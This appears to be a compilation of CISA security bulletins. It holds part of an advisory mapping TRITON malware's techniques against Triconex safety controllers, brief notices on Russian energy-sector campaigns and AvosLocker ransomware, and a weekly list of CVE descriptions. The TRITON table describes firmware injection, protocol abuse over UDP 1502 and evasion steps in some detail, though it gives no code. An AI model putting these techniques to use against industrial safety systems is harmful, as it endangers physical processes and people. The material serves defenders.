Monitor: monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as File Transfer Protocol, that does not normally occur may also be suspicious. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Use intrusion detection signatures to block traffic at network boundaries. |
TRITON Malware
Table 4 maps TRITON’s capabilities to the ATT&CK for ICS framework. For mitigations to harden ICS/OT environments, refer to the Mitigations section of this advisory.
Table 4: ICS Domain Tactics and Techniques for TRITON [4]
| Initial Access |
Engineering Workstation Compromise [T0818] |
TRITON compromises workstations within the safety network. |
| Execution |
Change Operating Mode [T0858] Note: this technique also applies to Evasion. |
TRITON can halt or run a program through the TriStation protocol. (Note: TriStation protocol is the protocol that Triconex System software uses to communicate with the Tricon PLCs.) |
|
Execution through API [T0871] |
TRITON leverages a custom implementation of the TriStation protocol, which triggers APIs related to program download, program allocation, and program changes. | |
|
Hooking [T0874] Note: this technique also applies to Tactic: Privilege Escalation. |
TRITON’s injector modifies the address of the handler for a Tristation protocol command so that when the command is received, the payload may be executed instead of normal processing. | |
| Modify Controller Tasking [T0821] | Some TRITON components are added to the program table on the Tricon so that they are executed by the firmware once each cycle. | |
| Native API [T0834] | TRITON’s payload takes commands from TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex), and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. |
|
| Scripting [T0853] |
TRITON communicates with Triconex Tricon PLCs using its custom Python script. This Python script communicates using four Python modules that collectively implement the TriStation protocol via User Datagram Protocol (UDP) 1502. Note: this use also applies to:
|
|
| Persistence |
System Firmware [T0857] Note: this technique also applies to Tactic: Inhibit Response Function. |
TRITON’s injector injects the payload into the Tricon PLCs’ running firmware. A threat actor can use the payload to read and write memory on the PLC and execute code at an arbitrary address within the firmware. If the memory address it writes to is within the firmware region, the malicious payload disables address translation, writes the code at the provided address, flushes the instruction cache, and re-enables address translation. This allows the malware to change the running firmware. |
| Privilege Escalation | Exploitation for Privilege Escalation [T0890] | TRITON can gain supervisor-level access and control system states by exploiting a vulnerability. |
| Evasion | Exploitation for Evasion [T0820] | TRITON’s injector exploits a vulnerability in the device firmware to escalate privileges and then it disables and (later patches) a firmware RAM/ROM consistency check. |
| Indicator Removal on Host [T0872] | After running the malicious payload, TRITON’s Python script overwrites the malicious payload with a “dummy” program. | |
|
Masquerading [T0849] |
TRITON’s Python script masquerades as legitimate Triconex software. | |
| TRITON’s injector masquerades as a standard compiled PowerPC program for the Triconex PLC. | ||
| Discovery |
Remote System Discovery [T0846] |
TRITON’s Python script can autodetect Triconex PLCs on the network by sending a UDP broadcast packet over port 1502. |
| Lateral Movement | Program Download [T0843] | TRITON leverages the TriStation protocol to download programs to the Tricon PLCs. |
| Collection | Detect Operating Mode [T0868] | A TRITON Python module provides string representations of different features of the TriStation protocol, including message and error codes, key position states, and other values returned by the status functions. |
|
Program Upload [T0845] |
TRITON uploads its payload to the Tricon PLCs. | |
| Impair Process Control | Unauthorized Command Message [T0855] | A threat actor can use TRITON to prevent the Tricon PLC from functioning appropriately. |
| Impact | Loss of Safety [T0880] | TRITON can reprogram the safety PLC logic to allow unsafe conditions or state to persist. |
Revisions
- March 24, 2022: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
Original release date: March 24, 2022
CISA, the Federal Bureau of Investigation, and the Department of Energy have released a joint Cybersecurity Advisory (CSA) detailing campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 that targeted U.S. and international Energy Sector organizations. The CSA highlights historical tactics, techniques, and procedures as well as mitigations Energy Sector organizations can take now to protect their networks.
CISA encourages all critical infrastructure organizations to review joint CSA: Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector and apply the recommendations. For more information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Cyber Threat Overview and Advisories page.
This product is provided subject to this Notification and this Privacy & Use policy.
A patch fixes exploit hidden in Elden Ring that traps PC players in a ‘death loop.’
“Evolving intelligence” shows Russia amping up for cyber-war in response to Ukraine-related sanctions, the White House said — but researchers warn that many orgs are not prepared.
Original release date: March 22, 2022
The Federal Bureau of Investigation (FBI) and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) have released a joint Cybersecurity Advisory identifying indicators of compromise associated with AvosLocker ransomware. AvosLocker is a ransomware-as-a-service affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors.
CISA encourages organizations to review the joint Cybersecurity Advisory and apply the recommended mitigations.
This product is provided subject to this Notification and this Privacy & Use policy.
Original release date: March 21, 2022
High Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| 10web — photo_gallery | The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection | 2022-03-14 | 7.5 | CVE-2022-0169 MISC CONFIRM |
| adobe — illustrator | Adobe Illustrator version 26.0.3 (and earlier) is affected by a buffer overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Illustrator. | 2022-03-11 | 9.3 | CVE-2022-23187 MISC |
| apache — http_server | Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions. | 2022-03-14 | 7.5 | CVE-2022-23943 MISC MLIST |
| apache — http_server | Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling | 2022-03-14 | 7.5 | CVE-2022-22720 MISC MLIST |
| bluproducts — g90_firmware | An issue was discovered in Luna Simo PPR1.180610.011/202001031830. A pre-installed app with a package name of com.skyroam.silverhelper writes three IMEI values to system properties at system startup. The system property values can be obtained via getprop by all third-party applications co-located on the device, even those with no permissions granted, exposing the IMEI values to processes without enforcing any access control. | 2022-03-11 | 7.2 | CVE-2021-41850 MISC MISC MISC MISC |
| dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24420 MISC |
| dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24419 MISC |
| dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24416 MISC |
| dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24415 MISC |
| dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24421 MISC |
| lg — webos | The public API error causes for the attacker to be able to bypass API access control. | 2022-03-11 | 7.5 | CVE-2022-23730 MISC |
| molie_instructure_canvas_linking_tool_project — molie_instructure_canvas_linking_tool | The MOLIE WordPress plugin through 0.5 does not validate and escape a post parameter before using in a SQL statement, leading to an SQL Injection | 2022-03-14 | 7.5 | CVE-2021-25007 MISC |
| nystudio107 — seomatic | A Server-side Template Injection (SSTI) vulnerability exists in Nystudio107 Seomatic 3.4.12 in src/helpers/UrlHelper.php via the host header. | 2022-03-11 | 7.5 | CVE-2021-44618 MISC MISC |
| parseplatform — parse-server | Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm. | 2022-03-12 | 7.5 | CVE-2022-24760 CONFIRM MISC |
| ponton — x/p_messenger | An issue was discovered in PONTON X/P Messenger before 3.11.2. Due to path traversal in private/SchemaSetUpload.do for uploaded ZIP files, an executable script can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server via an imgs/*.jsp URI. | 2022-03-13 | 7.5 | CVE-2021-45887 MISC MISC |
| simple-git_project — simple-git | The package simple-git before 3.3.0 are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution. | 2022-03-11 | 7.5 | CVE-2022-24433 MISC MISC MISC MISC |
| totolink — a3100r_firmware | A Command Injection vulnerability exits in TOTOLINK A3100R <=V4.1.2cu.5050_B20200504 in adm/ntm.asp via the hosTime parameters. | 2022-03-11 | 7.5 | CVE-2021-44620 MISC MISC MISC MISC |
| tribalsystems — zenario | Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth. | 2022-03-14 | 7.5 | CVE-2021-42171 MISC |
| wptaskforce — wpcargo_track_&_trace | The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE | 2022-03-14 | 7.5 | CVE-2021-25003 MISC |
| yokogawa — centum_vp_firmware | The following Yokogawa Electric products hard-code the password for CAMS server applications: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00 | 2022-03-11 | 7.5 | CVE-2022-23402 CONFIRM |
Medium Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| abb — ellipse_enterprise_asset_management | An attacker could trick a user of Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 into visiting a malicious website posing as a login page for the Ellipse application and gather authentication credentials. | 2022-03-11 | 4.3 | CVE-2021-27414 CONFIRM CONFIRM |
| abb — ellipse_enterprise_asset_management | An attacker could exploit this vulnerability in Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 by tricking a user to click on a link containing malicious code that would then be run by the web browser. This can result in the compromise of confidential information, or even the takeover of the user’s session. | 2022-03-11 | 5.8 | CVE-2021-27416 CONFIRM CONFIRM |
| alibaba — nacos | A Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters. | 2022-03-11 | 4.3 | CVE-2021-44667 MISC |
| alist_project — alist | Alist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist. | 2022-03-12 | 4.3 | CVE-2022-26533 MISC |
| apache — http_server | A carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier. | 2022-03-14 | 5 | CVE-2022-22719 MISC MLIST |
| apache — http_server | If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier. | 2022-03-14 | 6.8 | CVE-2022-22721 MISC MLIST |
| atlassian — crucible | The DefaultRepositoryAdminService class in Fisheye and Crucible before version 4.8.9 allowed remote attackers, who have ‘can add repository permission’, to enumerate the existence of internal network and filesystem resources via a Server-Side Request Forgery (SSRF) vulnerability. | 2022-03-14 | 4 | CVE-2021-43954 MISC MISC |
| bestwebsoft — error_log_viewer | The Error Log Viewer WordPress plugin through 1.1.1 does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder | 2022-03-14 | 4 | CVE-2021-24966 MISC |
| bwp-google-xml-sitemaps_project — bwp-google-xml-sitemaps | The Better WordPress Google XML Sitemaps WordPress plugin through 1.4.1 does not sanitise and escape its logs when outputting them in the admin dashboard, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins | 2022-03-14 | 4.3 | CVE-2022-0230 MISC |
| contact-form-submission_project — contact-form-submission | The Contact Form Submissions WordPress plugin before 1.7.3 does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission | 2022-03-14 | 4.3 | CVE-2022-0248 MISC CONFIRM |
| cookieinformation — wp-gdpr-compliance | The Cookie Information | Free GDPR Consent Solution WordPress plugin before 2.0.8 does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue | 2022-03-14 | 4.3 | CVE-2022-0147 MISC CONFIRM |
| fasterxml — jackson-databind | jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. | 2022-03-11 | 5 | CVE-2020-36518 MISC |
| gpac — gpac | GPAC 1.0.1 is affected by a NULL pointer dereference in gf_dump_vrml_field.isra (). | 2022-03-14 | 4.3 | CVE-2022-24574 MISC |
| gpac — gpac | GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box. | 2022-03-12 | 6.8 | CVE-2022-26967 MISC |
| gpac — gpac | GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box. | 2022-03-14 | 6.8 | CVE-2022-24575 MISC MISC |
| gpac — gpac | GPAC 1.0.1 is affected by Use After Free through MP4Box. | 2022-03-14 | 4.3 | CVE-2022-24576 MISC MISC |
| huawei — atune | atune before 0.3-0.8 log in as a local user and run the curl command to access the local atune url interface to escalate the local privilege or modify any file. Authentication is not forcibly enabled in the default configuration. | 2022-03-11 | 4.6 | CVE-2021-33658 CONFIRM |
| intel — atom_c2308 | Hardware allows activation of test or debug logic at runtime for some Intel(R) Trace Hub instances which may allow an unauthenticated user to potentially enable escalation of privilege via physical access. | 2022-03-11 | 4.6 | CVE-2021-33150 MISC |
| king-theme — kingcomposer | The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users | 2022-03-14 | 6.8 | CVE-2022-0165 MISC |
| lg — webos | V8 javascript engine (heap vulnerability) can cause privilege escalation ,which can impact on some webOS TV models. | 2022-03-11 | 4.6 | CVE-2022-23731 MISC |
| liblouis — liblouis | Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c). | 2022-03-13 | 6.8 | CVE-2022-26981 MISC |
| libtiff — libtiff | Out-of-bounds Read error in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 408976c4. | 2022-03-11 | 4.3 | CVE-2022-0924 MISC CONFIRM MISC |
| libtiff — libtiff | Null source pointer passed as an argument to memcpy() function within TIFFFetchNormalTag () in tif_dirread.c in libtiff versions up to 4.3.0 could lead to Denial of Service via crafted TIFF file. | 2022-03-11 | 4.3 | CVE-2022-0908 CONFIRM MISC MISC |
| libtiff — libtiff | Unchecked Return Value to NULL Pointer Dereference in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f2b656e2. | 2022-03-11 | 4.3 | CVE-2022-0907 MISC CONFIRM MISC |
| libtiff — libtiff | Divide By Zero error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f8d0f9aa. | 2022-03-11 | 4.3 | CVE-2022-0909 MISC MISC CONFIRM |
| lua — lua | Use after free in garbage collector and finalizer of lgc.c in Lua interpreter 5.4.0~5.4.3 allows attackers to perform Sandbox Escape via a crafted script file. | 2022-03-14 | 4.3 | CVE-2021-44964 MISC MISC MISC MISC MISC |
| microweber — microweber | Abusing Backup/Restore feature to achieve Remote Code Execution in GitHub repository microweber/microweber prior to 1.2.12. | 2022-03-11 | 6.5 | CVE-2022-0921 MISC CONFIRM |
| microweber — microweber | Integer Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3. | 2022-03-11 | 5 | CVE-2022-0913 CONFIRM MISC |
| microweber — microweber | XSS on dynamic_text module in GitHub repository microweber/microweber prior to 1.2.11. | 2022-03-12 | 4.3 | CVE-2022-0929 MISC CONFIRM |
| mirametrix — glance | Mirametrix Glance before 5.1.1.42207 (released on 2018-08-30) allows a local attacker to elevate privileges. NOTE: this is unrelated to products from the glance.com and glance.net websites. | 2022-03-13 | 4.6 | CVE-2022-24696 MISC |
| molie_instructure_canvas_linking_tool_project — molie_instructure_canvas_linking_tool | The MOLIE WordPress plugin through 0.5 does not escape the course_id parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue | 2022-03-14 | 4.3 | CVE-2021-25006 MISC |
| moodle — moodle | The last time a user accessed the mobile app is displayed on their profile page, but should be restricted to users with the relevant capability (site administrators by default). Moodle versions 3.10 to 3.10.3 are affected. | 2022-03-11 | 4 | CVE-2021-32477 MISC |
| moodle — moodle | The redirect URI in the LTI authorization endpoint required extra sanitizing to prevent reflected XSS and open redirect risks. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 and earlier unsupported versions are affected. | 2022-03-11 | 4.3 | CVE-2021-32478 MISC |
| moodle — moodle | An SQL injection risk existed on sites with MNet enabled and configured, via an XML-RPC call from the connected peer host. Note that this required site administrator access or access to the keypair. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. | 2022-03-11 | 6.5 | CVE-2021-32474 MISC |
| moodle — moodle | A denial-of-service risk was identified in the draft files area, due to it not respecting user file upload limits. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. | 2022-03-11 | 5 | CVE-2021-32476 MISC |
| moodle — moodle | It was possible for a student to view their quiz grade before it had been released, using a quiz web service. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected | 2022-03-11 | 5 | CVE-2021-32473 MISC |
| onenav_project — onenav | An issue in index.php of OneNav v0.9.14 allows attackers to perform directory traversal. | 2022-03-12 | 5 | CVE-2022-26276 MISC |
| oppo — coloros | In ACE2 ColorOS11, the attacker can obtain the foreground package name through permission promotion, resulting in user information disclosure. | 2022-03-11 | 5 | CVE-2021-23246 MISC |
| orchardcore — orchardcore | Cross-site Scripting (XSS) – Stored in GitHub repository orchardcms/orchardcore prior to 1.3.0. | 2022-03-11 | 4.3 | CVE-2022-0820 CONFIRM MISC |
| orchardcore — orchardcore | Improper Authorization in GitHub repository orchardcms/orchardcore prior to 1.3.0. | 2022-03-11 | 4 | CVE-2022-0821 CONFIRM MISC |
| phpliteadmin — phpliteadmin | phpLiteAdmin through 1.9.8.2 allows XSS via the index.php newRows parameter (aka num or number). | 2022-03-13 | 4.3 | CVE-2021-46709 MISC |
| ponton — x/p_messenger | An issue was discovered in PONTON X/P Messenger before 3.11.2. Anti-CSRF tokens are globally valid, making the web application vulnerable to a weakened version of CSRF, where an arbitrary token of a low-privileged user (such as operator) can be used to confirm actions of higher-privileged ones (such as xpadmin). | 2022-03-13 | 6.8 | CVE-2021-45886 MISC MISC |
| redhat — descision_manager | A flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability. | 2022-03-11 | 5 | CVE-2022-0853 MISC MISC |
| saleor — saleor | Improper Authorization in GitHub repository saleor/saleor prior to 3.1.2. | 2022-03-11 | 4 | CVE-2022-0932 CONFIRM MISC |
| secomea — gatemanager | Cross-site Scripting (XSS) vulnerability in firmware section of Secomea GateManager allows logged in user to inject javascript in browser session. This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions. | 2022-03-11 | 4.3 | CVE-2021-32009 MISC |
| smartertools — smartertrack | Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. | 2022-03-14 | 4.3 | CVE-2022-24384 CONFIRM CONFIRM |
| smartertools — smartertrack | A Direct Object Access vulnerability in SmarterTools SmarterTrack leads to information disclosure This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. | 2022-03-14 | 4 | CVE-2022-24385 CONFIRM CONFIRM |
| smartertools — smartertrack | With administrator or admin privileges the application can be tricked into overwriting files in app_data/Config folder, e.g. the systemsettings.xml file. THis is possible in SmarterTrack v100.0.8019.14010 | 2022-03-14 | 6.5 | CVE-2022-24387 CONFIRM CONFIRM |
| softing — datafeed_opc_suite | An issue was discovered in Softing OPC UA C++ SDK before 5.70. An invalid XML element in the type dictionary makes the OPC/UA client crash due to an out-of-memory condition. | 2022-03-11 | 4 | CVE-2021-42262 MISC MISC |
| softing — datafeed_opc_suite | An issue was discovered in Softing OPC UA C++ SDK before 5.70. A malformed OPC/UA message abort packet makes the client crash with a NULL pointer dereference. | 2022-03-11 | 5 | CVE-2021-42577 MISC MISC |
| techspawn — wp-email-users | The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks. | 2022-03-14 | 6.5 | CVE-2021-24959 MISC |
| timescale — timescaledb | Timescale TimescaleDB 1.x and 2.x before 2.5.2 may allow privilege escalation during extension installation. The installation process uses commands such as CREATE x IF NOT EXIST that allow an unprivileged user to precreate objects. These objects will be used by the installer (which executes as Superuser), leading to privilege escalation. In order to be able to take advantage of this, an unprivileged user would need to be able to create objects in a database and then get a Superuser to install TimescaleDB into their database. (In the fixed versions, the installation aborts when it finds that an object already exists.) | 2022-03-13 | 6 | CVE-2022-24128 MISC CONFIRM |
| tipsandtricks-hq — simple_download_monitor | The Simple Download Monitor WordPress plugin before 3.9.5 allows users with a role as low as Contributor to download any file on the web server (such as wp-config.php) via a path traversal vector. | 2022-03-14 | 4 | CVE-2021-24692 MISC |
| wire — wire | Wire-ios is a messaging application using the wire protocol on apple’s ios platform. In versions prior to 3.95 malformed resource identifiers may render the iOS Wire Client completely unusable by causing it to repeatedly crash on launch. These malformed resource identifiers can be generated and sent between Wire users. The root cause lies in [wireapp/wire-ios-transport](https://github.com/wireapp/wire-ios-transport), where code responsible for removing sensible tokens before logging may fail and lead to a crash (Swift exception) of the application. This causes undesirable behavior, however the (greater) Wire system is still functional. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. | 2022-03-11 | 4 | CVE-2022-23625 MISC MISC CONFIRM |
| wki — idpay_for_contact_form_7 | The IDPay for Contact Form 7 WordPress plugin through 2.1.2 does not sanitise and escape the idpay_error parameter before outputting it back in the page leading to a Reflected Cross-Site Scripting | 2022-03-14 | 4.3 | CVE-2021-24996 MISC |
| woocommerce — persian-woocommerce | The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue | 2022-03-14 | 4.3 | CVE-2021-24940 MISC |
| yokogawa — centum_cs_3000_firmware | ‘Root Service’ service implemented in the following Yokogawa Electric products creates some named pipe with improper ACL configuration. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 6.9 | CVE-2022-22148 CONFIRM |
| yokogawa — centum_cs_3000_firmware | CAMS for HIS Log Server contained in the following Yokogawa Electric products fails to properly neutralize log outputs: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 4.9 | CVE-2022-22151 CONFIRM |
| yokogawa — centum_cs_3000_firmware | CAMS for HIS Log Server contained in the following Yokogawa Electric products is vulnerable to uncontrolled resource consumption. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 4.9 | CVE-2022-22145 CONFIRM |
| yokogawa — centum_cs_3000_firmware | There is a path traversal vulnerability in CAMS for HIS Log Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, andfrom R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 4.9 | CVE-2022-21177 CONFIRM |
| yokogawa — centum_cs_3000_firmware | CAMS for HIS Server contained in the following Yokogawa Electric products improperly authenticate the receiving packets. The authentication may be bypassed via some crafted packets: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 6 | CVE-2022-22729 CONFIRM |
| yokogawa — centum_cs_3000_firmware | Path traversal vulnerability exists in CAMS for HIS Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 6 | CVE-2022-21808 CONFIRM |
| yokogawa — centum_cs_3000_firmware | ‘Long-term Data Archive Package’ service implemented in the following Yokogawa Electric products creates some named pipe with imporper ACL configuration. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 4.4 | CVE-2022-22141 CONFIRM |
| yokogawa — centum_vp_firmware | The following Yokogawa Electric products do not change the passwords of the internal Windows accounts from the initial configuration: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.0, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 6.8 | CVE-2022-21194 CONFIRM |
Low Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| amd — athlon_x4_940_firmware | Some AMD CPUs may transiently execute beyond unconditional direct branches, which may potentially result in data leakage. | 2022-03-11 | 2.1 | CVE-2021-26341 MISC MLIST |
| amd — athlon_x4_940_firmware | LFENCE/JMP (mitigation V2-2) may not sufficiently mitigate CVE-2017-5715 on some AMD CPUs. | 2022-03-11 | 1.9 | CVE-2021-26401 MISC MLIST |
| b3log — vditor | Cross-site Scripting (XSS) – Stored in GitHub repository vanessa219/vditor prior to 3.8.12. | 2022-03-14 | 3.5 | CVE-2022-0341 CONFIRM MISC |
| bluproducts — g90_firmware | An issue was discovered in Luna Simo PPR1.180610.011/202001031830. It sends the following Personally Identifiable Information (PII) in plaintext using HTTP to servers located in China: user’s list of installed apps and device International Mobile Equipment Identity (IMEI). This PII is transmitted to log.skyroam.com.cn using HTTP, independent of whether the user uses the Simo software. | 2022-03-11 | 2.1 | CVE-2021-41849 MISC MISC MISC MISC |
| childtheme-generator — child_theme_generator | The Child Theme Generator WordPress plugin through 2.2.7 does not sanitise escape the parade parameter before outputting it back, leading to a Reflected Cross-Site Scripting in the admin dashboard | 2022-03-14 | 3.5 | CVE-2021-24982 MISC |
| html5_responsive_faq_project — html5_responsive_faq | The HTML5 Responsive FAQ WordPress plugin through 2.8.5 does not properly sanitise and escape some of its settings, which could allow a high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed | 2022-03-14 | 3.5 | CVE-2021-24995 MISC |
| intel — atom_c3308 | Non-transparent sharing of branch predictor within a context in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. | 2022-03-11 | 2.1 | CVE-2022-0002 MISC MLIST |
| intel — atom_p5921b | Non-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. | 2022-03-11 | 2.1 | CVE-2022-0001 MISC MLIST |
| linux — linux_kernel | An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device. | 2022-03-12 | 2.1 | CVE-2022-26966 MISC MISC |
| microweber — microweber | File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12. | 2022-03-12 | 3.5 | CVE-2022-0930 MISC CONFIRM |
| microweber — microweber | Unrestricted Upload of File with Dangerous Type in GitHub repository microweber/microweber prior to 1.2.11. | 2022-03-11 | 3.5 | CVE-2022-0912 MISC CONFIRM |
| microweber — microweber | File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12. | 2022-03-12 | 3.5 | CVE-2022-0926 MISC CONFIRM |
